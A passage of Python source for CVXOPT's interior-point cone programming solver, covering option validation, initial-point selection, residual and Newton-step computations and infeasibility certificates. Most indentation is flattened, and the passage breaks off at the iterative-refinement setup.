- 'residual as dual infeasibility certificate':
None if c'*x >= 0; the maximum of the residuals
|| G*x + s || / ( -c'*x * max(1, ||h||) )
and
|| A*x || / ( -c'*x * max(1, ||b||) )
otherwise.
Termination with status 'unknown' indicates that the algorithm
failed to find a solution that satisfies the specified tolerances.
In some cases, the returned solution may be fairly accurate. If
the primal and dual infeasibilities, the gap, and the relative gap
are small, then x, y, s, z are close to optimal. If the residual
as primal infeasibility certificate is small, then
y / (-h'*z - b'*y), z / (-h'*z - b'*y)
provide an approximate certificate of primal infeasibility. If
the residual as certificate of dual infeasibility is small, then
x / (-c'*x), s / (-c'*x)
provide an approximate proof of dual infeasibility.
Advanced usage.
Three mechanisms are provided to express problem structure.
1. The user can provide a customized routine for solving linear
equations (`KKT systems')
[ 0 A' G' ] [ ux ] [ bx ]
[ A 0 0 ] [ uy ] = [ by ].
[ G 0 -W'*W ] [ uz ] [ bz ]
W is a scaling matrix, a block diagonal mapping
W*z = ( W0*z_0, ..., W_{N+M}*z_{N+M} )
defined as follows.
- For the 'l' block (W_0):
W_0 = diag(d),
with d a positive vector of length ml.
- For the 'q' blocks (W_{k+1}, k = 0, ..., N-1):
W_{k+1} = beta_k * ( 2 * v_k * v_k' - J )
where beta_k is a positive scalar, v_k is a vector in R^mq[k]
with v_k[0] > 0 and v_k'*J*v_k = 1, and J = [1, 0; 0, -I].
- For the 's' blocks (W_{k+N}, k = 0, ..., M-1):
W_k * x = vec(r_k' * mat(x) * r_k)
where r_k is a nonsingular matrix of order ms[k], and mat(x) is
the inverse of the vec operation.
The optional argument kktsolver is a Python function that will be
called as f = kktsolver(W), where W is a dictionary that contains
the parameters of the scaling:
- W['d'] is a positive 'd' matrix of size (ml,1).
- W['di'] is a positive 'd' matrix with the elementwise inverse of
W['d'].
- W['beta'] is a list [ beta_0, ..., beta_{N-1} ]
- W['v'] is a list [ v_0, ..., v_{N-1} ]
- W['r'] is a list [ r_0, ..., r_{M-1} ]
- W['rti'] is a list [ rti_0, ..., rti_{M-1} ], with rti_k the
inverse of the transpose of r_k.
The call f = kktsolver(W) should return a function f that solves
the KKT system by f(x, y, z). On entry, x, y, z contain the
righthand side bx, by, bz. On exit, they contain the solution,
with uz scaled: the argument z contains W*uz. In other words,
on exit, x, y, z are the solution of
[ 0 A' G'*W^{-1} ] [ ux ] [ bx ]
[ A 0 0 ] [ uy ] = [ by ].
[ G 0 -W' ] [ uz ] [ bz ]
2. The linear operators G*u and A*u can be specified by providing
Python functions instead of matrices. This can only be done in
combination with 1. above, i.e., it requires the kktsolver
argument.
If G is a function, the call G(u, v, alpha, beta, trans)
should evaluate the matrix-vector products
v := alpha * G * u + beta * v if trans is 'N'
v := alpha * G' * u + beta * v if trans is 'T'.
The arguments u and v are required. The other arguments have
default values alpha = 1.0, beta = 0.0, trans = 'N'.
If A is a function, the call A(u, v, alpha, beta, trans) should
evaluate the matrix-vectors products
v := alpha * A * u + beta * v if trans is 'N'
v := alpha * A' * u + beta * v if trans is 'T'.
The arguments u and v are required. The other arguments
have default values alpha = 1.0, beta = 0.0, trans = 'N'.
3. Instead of using the default representation of the primal
variable x and the dual variable y as one-column 'd' matrices,
we can represent these variables and the corresponding parameters
c and b by arbitrary Python objects (matrices, lists, dictionaries,
etc.). This can only be done in combination with 1. and 2. above,
i.e., it requires a user-provided KKT solver and an operator
description of the linear mappings. It also requires the arguments
xnewcopy, xdot, xscal, xaxpy, ynewcopy, ydot, yscal, yaxpy. These
arguments are functions defined as follows.
If X is the vector space of primal variables x, then:
- xnewcopy(u) creates a new copy of the vector u in X.
- xdot(u, v) returns the inner product of two vectors u and v in X.
- xscal(alpha, u) computes u := alpha*u, where alpha is a scalar
and u is a vector in X.
- xaxpy(u, v, alpha = 1.0) computes v := alpha*u + v for a scalar
alpha and two vectors u and v in X.
If this option is used, the argument c must be in the same format
as x, the argument G must be a Python function, the argument A
must be a Python function or None, and the argument kktsolver is
required.
If Y is the vector space of primal variables y:
- ynewcopy(u) creates a new copy of the vector u in Y.
- ydot(u, v) returns the inner product of two vectors u and v in Y.
- yscal(alpha, u) computes u := alpha*u, where alpha is a scalar
and u is a vector in Y.
- yaxpy(u, v, alpha = 1.0) computes v := alpha*u + v for a scalar
alpha and two vectors u and v in Y.
If this option is used, the argument b must be in the same format
as y, the argument A must be a Python function or None, and the
argument kktsolver is required.
Control parameters.
The following control parameters can be modified by adding an
entry to the dictionary options.
options['show_progress'] True/False (default: True)
options['maxiters'] positive integer (default: 100)
options['refinement'] positive integer (default: 0 for problems
with no second-order cone and matrix inequality constraints;
1 otherwise)
options['abstol'] scalar (default: 1e-7 )
options['reltol'] scalar (default: 1e-6)
options['feastol'] scalar (default: 1e-7).
"""
import math
from cvxopt import base, blas, misc, matrix, spmatrix
EXPON = 3
STEP = 0.99
options = kwargs.get('options',globals()['options'])
DEBUG = options.get('debug', False)
KKTREG = options.get('kktreg',None)
if KKTREG is None:
pass
elif not isinstance(KKTREG,(float,int,long)) or KKTREG < 0.0:
raise ValueError("options['kktreg'] must be a nonnegative scalar")
MAXITERS = options.get('maxiters',100)
if not isinstance(MAXITERS,(int,long)) or MAXITERS < 1:
raise ValueError("options['maxiters'] must be a positive integer")
ABSTOL = options.get('abstol',1e-7)
if not isinstance(ABSTOL,(float,int,long)):
raise ValueError("options['abstol'] must be a scalar")
RELTOL = options.get('reltol',1e-6)
if not isinstance(RELTOL,(float,int,long)):
raise ValueError("options['reltol'] must be a scalar")
if RELTOL <= 0.0 and ABSTOL <= 0.0 :
raise ValueError("at least one of options['reltol'] and " \
"options['abstol'] must be positive")
FEASTOL = options.get('feastol',1e-7)
if not isinstance(FEASTOL,(float,int,long)) or FEASTOL <= 0.0:
raise ValueError("options['feastol'] must be a positive scalar")
show_progress = options.get('show_progress', True)
if kktsolver is None:
if dims and (dims['q'] or dims['s']):
kktsolver = 'qr'
else:
kktsolver = 'chol2'
defaultsolvers = ('ldl', 'ldl2', 'qr', 'chol', 'chol2')
if isinstance(kktsolver,str) and kktsolver not in defaultsolvers:
raise ValueError("'%s' is not a valid value for kktsolver" \
%kktsolver)
# Argument error checking depends on level of customization.
customkkt = not isinstance(kktsolver,str)
matrixG = isinstance(G, (matrix, spmatrix))
matrixA = isinstance(A, (matrix, spmatrix))
if (not matrixG or (not matrixA and A is not None)) and not customkkt:
raise ValueError("use of function valued G, A requires a "\
"user-provided kktsolver")
customx = (xnewcopy != None or xdot != None or xaxpy != None or
xscal != None)
if customx and (matrixG or matrixA or not customkkt):
raise ValueError("use of non-vector type for x requires "\
"function valued G, A and user-provided kktsolver")
customy = (ynewcopy != None or ydot != None or yaxpy != None or
yscal != None)
if customy and (matrixA or not customkkt):
raise ValueError("use of non-vector type for y requires "\
"function valued A and user-provided kktsolver")
if not customx and (not isinstance(c,matrix) or c.typecode != 'd' or c.size[1] != 1):
raise TypeError("'c' must be a 'd' matrix with one column")
if not isinstance(h,matrix) or h.typecode != 'd' or h.size[1] != 1:
raise TypeError("'h' must be a 'd' matrix with 1 column")
if not dims: dims = {'l': h.size[0], 'q': [], 's': []}
if not isinstance(dims['l'],(int,long)) or dims['l'] < 0:
raise TypeError("'dims['l']' must be a nonnegative integer")
if [ k for k in dims['q'] if not isinstance(k,(int,long)) or k < 1 ]:
raise TypeError("'dims['q']' must be a list of positive integers")
if [ k for k in dims['s'] if not isinstance(k,(int,long)) or k < 0 ]:
raise TypeError("'dims['s']' must be a list of nonnegative " \
"integers")
refinement = options.get('refinement',None)
if refinement is None:
if dims['q'] or dims['s']:
refinement = 1
else:
refinement = 0
elif not isinstance(refinement,(int,long)) or refinement < 0:
raise ValueError("options['refinement'] must be a nonnegative integer")
cdim = dims['l'] + sum(dims['q']) + sum([k**2 for k in dims['s']])
cdim_pckd = dims['l'] + sum(dims['q']) + sum([k*(k+1)/2 for k in
dims['s']])
cdim_diag = dims['l'] + sum(dims['q']) + sum(dims['s'])
if h.size[0] != cdim:
raise TypeError("'h' must be a 'd' matrix of size (%d,1)" %cdim)
# Data for kth 'q' constraint are found in rows indq[k]:indq[k+1] of G.
indq = [ dims['l'] ]
for k in dims['q']: indq = indq + [ indq[-1] + k ]
# Data for kth 's' constraint are found in rows inds[k]:inds[k+1] of G.
inds = [ indq[-1] ]
for k in dims['s']: inds = inds + [ inds[-1] + k**2 ]
if matrixG:
if G.typecode != 'd' or G.size != (cdim, c.size[0]):
raise TypeError("'G' must be a 'd' matrix of size (%d, %d)"\
%(cdim, c.size[0]))
        def Gf(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
            # Wrap the matrix G as a linear operator:
            #     y := alpha * G * x + beta * y     (trans == 'N')
            #     y := alpha * G' * x + beta * y    (trans == 'T'),
            # using the cone-structured sgemv so 's'-block storage is handled.
            misc.sgemv(G, x, y, dims, trans = trans, alpha = alpha,
                beta = beta)
else:
Gf = G
if A is None:
if customx or customy:
            def A(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
                # Default operator when A is absent: behaves as a 0 x n map.
                # trans == 'N': the image y is empty, so there is nothing to do.
                # trans == 'T': A'*x contributes nothing, so only y := beta*y.
                if trans == 'N': pass
                else: xscal(beta, y)
else:
A = spmatrix([], [], [], (0, c.size[0]))
matrixA = True
if matrixA:
if A.typecode != 'd' or A.size[1] != c.size[0]:
raise TypeError("'A' must be a 'd' matrix with %d columns "\
%c.size[0])
        def Af(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
            # Wrap the (dense or sparse) matrix A as a linear operator:
            #     y := alpha * op(A) * x + beta * y, op(A) = A or A'.
            base.gemv(A, x, y, trans = trans, alpha = alpha, beta = beta)
else:
Af = A
if not customy:
if b is None: b = matrix(0.0, (0,1))
if not isinstance(b,matrix) or b.typecode != 'd' or b.size[1] != 1:
raise TypeError("'b' must be a 'd' matrix with one column")
if matrixA and b.size[0] != A.size[0]:
raise TypeError("'b' must have length %d" %A.size[0])
else:
if b is None:
raise ValueError("use of non vector type for y requires b")
# kktsolver(W) returns a routine for solving 3x3 block KKT system
#
# [ 0 A' G'*W^{-1} ] [ ux ] [ bx ]
# [ A 0 0 ] [ uy ] = [ by ].
# [ G 0 -W' ] [ uz ] [ bz ]
if kktsolver in defaultsolvers:
if KKTREG is None and (b.size[0] > c.size[0] or b.size[0] + cdim_pckd < c.size[0]):
raise ValueError("Rank(A) < p or Rank([G; A]) < n")
if kktsolver == 'ldl':
factor = misc.kkt_ldl(G, dims, A, kktreg = KKTREG)
elif kktsolver == 'ldl2':
factor = misc.kkt_ldl2(G, dims, A)
elif kktsolver == 'qr':
factor = misc.kkt_qr(G, dims, A)
elif kktsolver == 'chol':
factor = misc.kkt_chol(G, dims, A)
else:
factor = misc.kkt_chol2(G, dims, A)
        def kktsolver(W):
            # Rebind the string-selected default solver to the common
            # callable interface: kktsolver(W) -> solve function g(x, y, z).
            return factor(W)
# res() evaluates residual in 5x5 block KKT system
#
# [ vx ] [ 0 ] [ 0 A' G' c ] [ ux ]
# [ vy ] [ 0 ] [-A 0 0 b ] [ uy ]
# [ vz ] += [ W'*us ] - [-G 0 0 h ] [ W^{-1}*uz ]
# [ vtau ] [ dg*ukappa ] [-c' -b' -h' 0 ] [ utau/dg ]
#
# vs += lmbda o (dz + ds)
# vkappa += lmbdg * (dtau + dkappa).
ws3, wz3 = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
    def res(ux, uy, uz, utau, us, ukappa, vx, vy, vz, vtau, vs, vkappa, W,
        dg, lmbda):
        # Accumulate into (vx, vy, vz, vtau, vs, vkappa) the residual of the
        # 5x5 self-dual-embedding KKT system at the trial step
        # (ux, uy, uz, utau, us, ukappa); see the block-matrix comment above.
        # All updates are in place; uz is given in the scaled space (W^{-1}*uz)
        # and us in the scaled space as well.  ws3/wz3 are scratch vectors
        # shared with the enclosing scope.
        # vx := vx - A'*uy - G'*W^{-1}*uz - c*utau/dg
        Af(uy, vx, alpha = -1.0, beta = 1.0, trans = 'T')
        blas.copy(uz, wz3)
        misc.scale(wz3, W, inverse = 'I')
        Gf(wz3, vx, alpha = -1.0, beta = 1.0, trans = 'T')
        xaxpy(c, vx, alpha = -utau[0]/dg)
        # vy := vy + A*ux - b*utau/dg
        Af(ux, vy, alpha = 1.0, beta = 1.0)
        yaxpy(b, vy, alpha = -utau[0]/dg)
        # vz := vz + G*ux - h*utau/dg + W'*us
        Gf(ux, vz, alpha = 1.0, beta = 1.0)
        blas.axpy(h, vz, alpha = -utau[0]/dg)
        blas.copy(us, ws3)
        misc.scale(ws3, W, trans = 'T')
        blas.axpy(ws3, vz)
        # vtau := vtau + c'*ux + b'*uy + h'*W^{-1}*uz + dg*ukappa
        vtau[0] += dg*ukappa[0] + xdot(c,ux) + ydot(b,uy) + \
            misc.sdot(h, wz3, dims)
        # vs := vs + lmbda o (uz + us)
        blas.copy(us, ws3)
        blas.axpy(uz, ws3)
        misc.sprod(ws3, lmbda, dims, diag = 'D')
        blas.axpy(ws3, vs)
        # vkappa := vkappa + lmbdag * (utau + ukappa), with lmbdag = lmbda[-1]
        vkappa[0] += lmbda[-1] * (utau[0] + ukappa[0])
if xnewcopy is None: xnewcopy = matrix
if xdot is None: xdot = blas.dot
if xaxpy is None: xaxpy = blas.axpy
if xscal is None: xscal = blas.scal
    def xcopy(x, y):
        # y := x, expressed via the user-supplied primitives only
        # (zero y, then add x), so it works for custom vector spaces X.
        xscal(0.0, y)
        xaxpy(x, y)
if ynewcopy is None: ynewcopy = matrix
if ydot is None: ydot = blas.dot
if yaxpy is None: yaxpy = blas.axpy
if yscal is None: yscal = blas.scal
    def ycopy(x, y):
        # y := x in the space Y, using only the user-supplied primitives
        # (zero y, then add x), so it works for custom vector spaces Y.
        yscal(0.0, y)
        yaxpy(x, y)
resx0 = max(1.0, math.sqrt(xdot(c,c)))
resy0 = max(1.0, math.sqrt(ydot(b,b)))
resz0 = max(1.0, misc.snrm2(h, dims))
# Select initial points.
x = xnewcopy(c); xscal(0.0, x)
y = ynewcopy(b); yscal(0.0, y)
s, z = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
dx, dy = xnewcopy(c), ynewcopy(b)
ds, dz = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
dkappa, dtau = matrix(0.0, (1,1)), matrix(0.0, (1,1))
if primalstart is None or dualstart is None:
# Factor
#
# [ 0 A' G' ]
# [ A 0 0 ].
# [ G 0 -I ]
W = {}
W['d'] = matrix(1.0, (dims['l'], 1))
W['di'] = matrix(1.0, (dims['l'], 1))
W['v'] = [ matrix(0.0, (m,1)) for m in dims['q'] ]
W['beta'] = len(dims['q']) * [ 1.0 ]
for v in W['v']: v[0] = 1.0
W['r'] = [ matrix(0.0, (m,m)) for m in dims['s'] ]
W['rti'] = [ matrix(0.0, (m,m)) for m in dims['s'] ]
for r in W['r']: r[::r.size[0]+1 ] = 1.0
for rti in W['rti']: rti[::rti.size[0]+1 ] = 1.0
try: f = kktsolver(W)
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([G; A]) < n")
if primalstart is None:
# minimize || G * x - h ||^2
# subject to A * x = b
#
# by solving
#
# [ 0 A' G' ] [ x ] [ 0 ]
# [ A 0 0 ] * [ dy ] = [ b ].
# [ G 0 -I ] [ -s ] [ h ]
xscal(0.0, x)
ycopy(b, dy)
blas.copy(h, s)
try: f(x, dy, s)
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([G; A]) < n")
blas.scal(-1.0, s)
else:
xcopy(primalstart['x'], x)
blas.copy(primalstart['s'], s)
# ts = min{ t | s + t*e >= 0 }
ts = misc.max_step(s, dims)
if ts >= 0 and primalstart:
raise ValueError("initial s is not positive")
if dualstart is None:
# minimize || z ||^2
# subject to G'*z + A'*y + c = 0
#
# by solving
#
# [ 0 A' G' ] [ dx ] [ -c ]
# [ A 0 0 ] [ y ] = [ 0 ].
# [ G 0 -I ] [ z ] [ 0 ]
xcopy(c, dx);
xscal(-1.0, dx)
yscal(0.0, y)
blas.scal(0.0, z)
try: f(dx, y, z)
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([G; A]) < n")
else:
if 'y' in dualstart: ycopy(dualstart['y'], y)
blas.copy(dualstart['z'], z)
# tz = min{ t | z + t*e >= 0 }
tz = misc.max_step(z, dims)
if tz >= 0 and dualstart:
raise ValueError("initial z is not positive")
nrms = misc.snrm2(s, dims)
nrmz = misc.snrm2(z, dims)
if primalstart is None and dualstart is None:
gap = misc.sdot(s, z, dims)
pcost = xdot(c,x)
dcost = -ydot(b,y) - misc.sdot(h, z, dims)
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
if (ts <= 0 and tz <= 0 and (gap <= ABSTOL or ( relgap is not None
and relgap <= RELTOL ))) and KKTREG is None:
# The initial points we constructed happen to be feasible and
# optimal.
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
# rx = A'*y + G'*z + c
rx = xnewcopy(c)
Af(y, rx, beta = 1.0, trans = 'T')
Gf(z, rx, beta = 1.0, trans = 'T')
resx = math.sqrt( xdot(rx, rx) )
# ry = b - A*x
ry = ynewcopy(b)
Af(x, ry, alpha = -1.0, beta = 1.0)
resy = math.sqrt( ydot(ry, ry) )
# rz = s + G*x - h
rz = matrix(0.0, (cdim,1))
Gf(x, rz)
blas.axpy(s, rz)
blas.axpy(h, rz, alpha = -1.0)
resz = misc.snrm2(rz, dims)
pres = max(resy/resy0, resz/resz0)
dres = resx/resx0
cx, by, hz = xdot(c,x), ydot(b,y), misc.sdot(h, z, dims)
if show_progress:
print("Optimal solution found.")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'optimal',
'gap': gap,
'relative gap': relgap,
'primal objective': cx,
'dual objective': -(by + hz),
'primal infeasibility': pres,
'primal slack': -ts,
'dual slack': -tz,
'dual infeasibility': dres,
'residual as primal infeasibility certificate': None,
'residual as dual infeasibility certificate': None,
'iterations': 0 }
if ts >= -1e-8 * max(nrms, 1.0):
a = 1.0 + ts
s[:dims['l']] += a
s[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
s[ind : ind+m*m : m+1] += a
ind += m**2
if tz >= -1e-8 * max(nrmz, 1.0):
a = 1.0 + tz
z[:dims['l']] += a
z[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
z[ind : ind+m*m : m+1] += a
ind += m**2
elif primalstart is None and dualstart is not None:
if ts >= -1e-8 * max(nrms, 1.0):
a = 1.0 + ts
s[:dims['l']] += a
s[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
s[ind : ind+m*m : m+1] += a
ind += m**2
elif primalstart is not None and dualstart is None:
if tz >= -1e-8 * max(nrmz, 1.0):
a = 1.0 + tz
z[:dims['l']] += a
z[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
z[ind : ind+m*m : m+1] += a
ind += m**2
tau, kappa = 1.0, 1.0
rx, hrx = xnewcopy(c), xnewcopy(c)
ry, hry = ynewcopy(b), ynewcopy(b)
rz, hrz = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
sigs = matrix(0.0, (sum(dims['s']), 1))
sigz = matrix(0.0, (sum(dims['s']), 1))
lmbda = matrix(0.0, (cdim_diag + 1, 1))
lmbdasq = matrix(0.0, (cdim_diag + 1, 1))
gap = misc.sdot(s, z, dims)
for iters in range(MAXITERS+1):
# hrx = -A'*y - G'*z
Af(y, hrx, alpha = -1.0, trans = 'T')
Gf(z, hrx, alpha = -1.0, beta = 1.0, trans = 'T')
hresx = math.sqrt( xdot(hrx, hrx) )
# rx = hrx - c*tau
# = -A'*y - G'*z - c*tau
xcopy(hrx, rx)
xaxpy(c, rx, alpha = -tau)
resx = math.sqrt( xdot(rx, rx) ) / tau
# hry = A*x
Af(x, hry)
hresy = math.sqrt( ydot(hry, hry) )
# ry = hry - b*tau
# = A*x - b*tau
ycopy(hry, ry)
yaxpy(b, ry, alpha = -tau)
resy = math.sqrt( ydot(ry, ry) ) / tau
# hrz = s + G*x
Gf(x, hrz)
blas.axpy(s, hrz)
hresz = misc.snrm2(hrz, dims)
# rz = hrz - h*tau
# = s + G*x - h*tau
blas.scal(0, rz)
blas.axpy(hrz, rz)
blas.axpy(h, rz, alpha = -tau)
resz = misc.snrm2(rz, dims) / tau
# rt = kappa + c'*x + b'*y + h'*z
cx, by, hz = xdot(c,x), ydot(b,y), misc.sdot(h, z, dims)
rt = kappa + cx + by + hz
# Statistics for stopping criteria.
pcost, dcost = cx / tau, -(by + hz) / tau
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
pres = max(resy/resy0, resz/resz0)
dres = resx/resx0
if hz + by < 0.0:
pinfres = hresx / resx0 / (-hz - by)
else:
pinfres = None
if cx < 0.0:
dinfres = max(hresy / resy0, hresz/resz0) / (-cx)
else:
dinfres = None
if show_progress:
if iters == 0:
print("% 10s% 12s% 10s% 8s% 7s % 5s" %("pcost", "dcost",
"gap", "pres", "dres", "k/t"))
print("%2d: % 8.4e % 8.4e % 4.0e% 7.0e% 7.0e% 7.0e" \
%(iters, pcost, dcost, gap, pres, dres, kappa/tau))
if ( pres <= FEASTOL and dres <= FEASTOL and ( gap <= ABSTOL or
(relgap is not None and relgap <= RELTOL) ) ) or \
iters == MAXITERS:
xscal(1.0/tau, x)
yscal(1.0/tau, y)
blas.scal(1.0/tau, s)
blas.scal(1.0/tau, z)
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
ts = misc.max_step(s, dims)
tz = misc.max_step(z, dims)
if iters == MAXITERS:
if show_progress:
print("Terminated (maximum number of iterations "\
"reached).")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'unknown',
'gap': gap,
'relative gap': relgap,
'primal objective': pcost,
'dual objective' : dcost,
'primal infeasibility': pres,
'dual infeasibility': dres,
'primal slack': -ts,
'dual slack': -tz,
'residual as primal infeasibility certificate':
pinfres,
'residual as dual infeasibility certificate':
dinfres,
'iterations': iters}
else:
if show_progress:
print("Optimal solution found.")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'optimal',
'gap': gap,
'relative gap': relgap,
'primal objective': pcost,
'dual objective' : dcost,
'primal infeasibility': pres,
'dual infeasibility': dres,
'primal slack': -ts,
'dual slack': -tz,
'residual as primal infeasibility certificate': None,
'residual as dual infeasibility certificate': None,
'iterations': iters }
elif pinfres is not None and pinfres <= FEASTOL:
yscal(1.0/(-hz - by), y)
blas.scal(1.0/(-hz - by), z)
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(z, m, ind)
ind += m**2
tz = misc.max_step(z, dims)
if show_progress:
print("Certificate of primal infeasibility found.")
return { 'x': None, 'y': y, 's': None, 'z': z,
'status': 'primal infeasible',
'gap': None,
'relative gap': None,
'primal objective': None,
'dual objective' : 1.0,
'primal infeasibility': None,
'dual infeasibility': None,
'primal slack': None,
'dual slack': -tz,
'residual as primal infeasibility certificate': pinfres,
'residual as dual infeasibility certificate': None,
'iterations': iters }
elif dinfres is not None and dinfres <= FEASTOL:
xscal(1.0/(-cx), x)
blas.scal(1.0/(-cx), s)
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
ind += m**2
y, z = None, None
ts = misc.max_step(s, dims)
if show_progress:
print("Certificate of dual infeasibility found.")
return {'x': x, 'y': None, 's': s, 'z': None,
'status': 'dual infeasible',
'gap': None,
'relative gap': None,
'primal objective': -1.0,
'dual objective' : None,
'primal infeasibility': None,
'dual infeasibility': None,
'primal slack': -ts,
'dual slack': None,
'residual as primal infeasibility certificate': None,
'residual as dual infeasibility certificate': dinfres,
'iterations': iters }
# Compute initial scaling W:
#
# W * z = W^{-T} * s = lambda
# dg * tau = 1/dg * kappa = lambdag.
if iters == 0:
W = misc.compute_scaling(s, z, lmbda, dims, mnl = 0)
# dg = sqrt( kappa / tau )
# dgi = sqrt( tau / kappa )
# lambda_g = sqrt( tau * kappa )
#
# lambda_g is stored in the last position of lmbda.
dg = math.sqrt( kappa / tau )
dgi = math.sqrt( tau / kappa )
lmbda[-1] = math.sqrt( tau * kappa )
# lmbdasq := lmbda o lmbda
misc.ssqr(lmbdasq, lmbda, dims)
lmbdasq[-1] = lmbda[-1]**2
# f3(x, y, z) solves
#
# [ 0 A' G' ] [ ux ] [ bx ]
# [ A 0 0 ] [ uy ] = [ by ].
# [ G 0 -W'*W ] [ W^{-1}*uz ] [ bz ]
#
# On entry, x, y, z contain bx, by, bz.
# On exit, they contain ux, uy, uz.
#
# Also solve
#
# [ 0 A' G' ] [ x1 ] [ c ]
# [-A 0 0 ]*[ y1 ] = -dgi * [ b ].
# [-G 0 W'*W ] [ W^{-1}*z1 ] [ h ]
try:
f3 = kktsolver(W)
if iters == 0:
x1, y1 = xnewcopy(c), ynewcopy(b)
z1 = matrix(0.0, (cdim,1))
xcopy(c, x1); xscal(-1, x1)
ycopy(b, y1)
blas.copy(h, z1)
f3(x1, y1, z1)
xscal(dgi, x1)
yscal(dgi, y1)
blas.scal(dgi, z1)
except ArithmeticError:
if iters == 0 and primalstart and dualstart:
raise ValueError("Rank(A) < p or Rank([G; A]) < n")
else:
xscal(1.0/tau, x)
yscal(1.0/tau, y)
blas.scal(1.0/tau, s)
blas.scal(1.0/tau, z)
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
ts = misc.max_step(s, dims)
tz = misc.max_step(z, dims)
if show_progress:
print("Terminated (singular KKT matrix).")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'unknown',
'gap': gap,
'relative gap': relgap,
'primal objective': pcost,
'dual objective' : dcost,
'primal infeasibility': pres,
'dual infeasibility': dres,
'primal slack': -ts,
'dual slack': -tz,
'residual as primal infeasibility certificate':
pinfres,
'residual as dual infeasibility certificate':
dinfres,
'iterations': iters }
# f6_no_ir(x, y, z, tau, s, kappa) solves
#
# [ 0 ] [ 0 A' G' c ] [ ux ] [ bx ]
# [ 0 ] [ -A 0 0 b ] [ uy ] [ by ]
# [ W'*us ] - [ -G 0 0 h ] [ W^{-1}*uz ] = -[ bz ]
# [ dg*ukappa ] [ -c' -b' -h' 0 ] [ utau/dg ] [ btau ]
#
# lmbda o (uz + us) = -bs
# lmbdag * (utau + ukappa) = -bkappa.
#
# On entry, x, y, z, tau, s, kappa contain bx, by, bz, btau,
# bkappa. On exit, they contain ux, uy, uz, utau, ukappa.
# th = W^{-T} * h
if iters == 0: th = matrix(0.0, (cdim,1))
blas.copy(h, th)
misc.scale(th, W, trans = 'T', inverse = 'I')
        def f6_no_ir(x, y, z, tau, s, kappa):
            # Solve the 6-variable Newton system described in the comment
            # block above this definition, WITHOUT iterative refinement.
            # On entry, (x, y, z, tau, s, kappa) hold the right-hand sides
            # (bx, by, bz, btau, bs, bkappa); on exit they hold the solution
            # (ux, uy, uz, utau, us, ukappa).  All updates are in place.
            #
            # Solve
            #
            #     [  0   A'  G'    0   ] [ ux        ]
            #     [ -A   0   0     b   ] [ uy        ]
            #     [ -G   0   W'*W  h   ] [ W^{-1}*uz ]
            #     [ -c' -b' -h'    k/t ] [ utau/dg   ]
            #
            #       [ bx                    ]
            #       [ by                    ]
            #     = [ bz - W'*(lmbda o\ bs) ]
            #       [ btau - bkappa/tau     ]
            #
            #     us = -lmbda o\ bs - uz
            #     ukappa = -bkappa/lmbdag - utau.
            # First solve
            #
            #     [ 0  A'  G'    ] [ ux        ]   [  bx                    ]
            #     [ A  0   0     ] [ uy        ] = [ -by                    ]
            #     [ G  0  -W'*W  ] [ W^{-1}*uz ]   [ -bz + W'*(lmbda o\ bs) ]
            # y := -y = -by
            yscal(-1.0, y)
            # s := -lmbda o\ s = -lmbda o\ bs
            misc.sinv(s, lmbda, dims)
            blas.scal(-1.0, s)
            # z := -(z + W'*s) = -bz + W'*(lambda o\ bs)
            blas.copy(s, ws3)
            misc.scale(ws3, W, trans = 'T')
            blas.axpy(ws3, z)
            blas.scal(-1.0, z)
            # Solve system.
            f3(x, y, z)
            # Combine with solution of
            #
            #     [ 0   A'  G'    ] [ x1        ]          [ c ]
            #     [-A   0   0     ] [ y1        ] = -dgi * [ b ]
            #     [-G   0   W'*W  ] [ W^{-1}*dzl]          [ h ]
            #
            # to satisfy
            #
            #     -c'*x - b'*y - h'*W^{-1}*z + dg*tau = btau - bkappa/tau.
            # kappa[0] := -kappa[0] / lmbd[-1] = -bkappa / lmbdag
            kappa[0] = -kappa[0] / lmbda[-1]
            # tau[0] = tau[0] + kappa[0] / dgi = btau[0] - bkappa / tau
            tau[0] += kappa[0] / dgi
            # utau/dg follows from the last equation of the 4x4 system; the
            # denominator 1 + z1'*z1 comes from eliminating the (x1, y1, z1)
            # correction direction.
            tau[0] = dgi * ( tau[0] + xdot(c,x) + ydot(b,y) +
                misc.sdot(th, z, dims) ) / (1.0 + misc.sdot(z1, z1, dims))
            xaxpy(x1, x, alpha = tau[0])
            yaxpy(y1, y, alpha = tau[0])
            blas.axpy(z1, z, alpha = tau[0])
            # s := s - z = - lambda o\ bs - z
            blas.axpy(z, s, alpha = -1)
            # ukappa = -bkappa/lmbdag - utau
            kappa[0] -= tau[0]
# f6(x, y, z, tau, s, kappa) solves the same system as f6_no_ir,
# but applies iterative refinement.
if iters == 0:
if refinement or DEBUG:
wx, wy = xnewcopy(c), ynewcopy(b)
wz, ws = matrix(0.0, (cdim, 1)), matrix(0.0, (cdim, 1))
wtau, wkappa = matrix(0.0), matrix(0.0)
if refinement:
